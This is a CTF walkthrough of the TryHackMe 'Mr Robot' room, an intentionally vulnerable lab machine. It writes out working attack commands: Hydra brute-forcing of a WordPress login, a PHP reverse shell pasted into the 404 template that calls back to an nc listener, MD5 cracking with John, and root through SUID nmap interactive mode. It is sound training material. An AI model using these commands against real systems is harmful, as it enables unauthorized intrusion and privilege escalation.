TryHackMe Walkthrough: Mr Robot CTF

This TryHackMe room is a medium CTF. This room is a Wordpress site that we were able to brute force the login using Hydra. We used the Wordpress theme editor to upload a reverse shell. From there, we found a MD5 password hash, which we used John the Ripper to crack. From there, we could switch to the robot user. We were able to escalate to root by abusing a SUID bit set on nmap. This allowed us to run nmap interactive mode as root, which allows us to spawn a shell.

https://tryhackme.com/room/mrrobot

As always, we begin with an nmap of the machine. The nmap indicated ports 22, 80, and 443 are open.

nmap -vv -A 10.10.52.69

nmap

Since this indicates there is a web server hosted, I navigated to the site to look for more. Right away, I tried the /robots.txt path and found 2 entries:

robots.txt file

I navigated to /key-1-of-3.txt to obtain the first key:

Key 1 of 3 file on the server

From there, I took a look at the fsocity.dic file. This downloaded a file that appeared to be a list of usernames/passwords:

fsocity.dic file

I originally thought this would work for ssh into the machine, but that is closed. I did some more enumeration on the web server and discovered it was a Wordpress site. I navigated to /wp-login.php to find the login page.

wp-login.php page

I tried the basic usernames and passwords before trying to brute force using the fsocity.dic file.

To begin, this application is vulnerable to username enumeration. I was able to use Hydra to brute force the username of Elliot with the following Hydra command:

hydra -L ~/Downloads/fsocity.dic -p pass 10.10.52.69 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.52.69%2Fwp-admin%2F&testcookie=1:Invalid username."

This Hydra command used the fsocity list to brute force the username only. The password at this point did not matter, we just needed a list of usernames.

Hydra usernames output

This worked because the application returned a different response when a valid username was provided, seen below:

Elliot username enumeration

From here, I focused on brute forcing the password for the Elliot user using Hydra. With a small adjustment to the command, Hydra was brute forcing the Wordpress site using the username we found before, Elliot:

$ hydra -l Elliot -P ~/Downloads/fsocity.dic 10.10.52.69 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.52.69%2Fwp-admin%2F&testcookie=1:incorrect"

This resulted in a valid password of ER28-0652.

Hydra brute forced the password

Now that we have a valid username and password, we can log into the admin console to the Wordpress site.

wp-admin page

Using the themes functionality, we can upload a reverse php shell.

First, we need to get our reverse PHP shell ready. In Kali, this can be found at /usr/share/webshells/php/php-reverse-shell.php. I copied this file to my Desktop so I can make the changes necessary.

I changed the reverse shell to be my IP address. I left the port as 1234 and I will open the listener on that port.

php reverse shell changed

Now, I navigated to the theme editor in the Wordpress Admin Panel. I decided to change the 404.php page to contain my reverse shell. I opened the 404 template and pasted my reverse shell in.

php reverse shell in the 404 template

Now, I started a listener on my machine with nc -nvlp 1234.

Navigate to the /404.php path and check your nc listener. We now have a shell as the daemon account.

reverse shell connected

After some digging, we found there is a user called robot and there is a key-2-of-3.txt file that we don’t have permission to see. But, there is an MD5 hash of a password we can see.

Password md5 hash

Using John the Ripper, we will crack this hash.

I took the raw-md5 hash and fed it into John using the fsocity.dic wordlist we found earlier.

sudo john -format=Raw-MD5 -wordlist=~/Downloads/fsocity.dic ~/Desktop/password.raw-md5

This gave us the password of: abcdefghijklmnopqrstuvwxyz

When trying to switch user to the robot user, we get an error that it must be run from a terminal. In this case, we can use Python to spawn a shell with the following commands

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

This gave us the ability to use the su command and switch to the user robot. Now we can cat out the key-2-of-3.txt file!

key-2-of-3.txt

Next, we need to escalate our privileges to root in order to get the last key. Using the following command, we can check for any files with SUID bit set. Any executables with the SUID bit set means we can run that executable with the same permissions as the owner of that file.

find / -perm -4000 2>/dev/null

From this, we can see nmap is set, which is a strange thing.

suid bit is set for nmap

Further investigation, we can see the nmap file is owned by root, which means we can run nmap with root permissions.

We can use the following commands to open nmap in an interactive mode, then open a shell.

nmap --interactive
!sh

Now we have root!

root via nmap interactive

With a little further digging, we can now cat key-3-of-3.txt

key-3-of-3.txt

That’s all!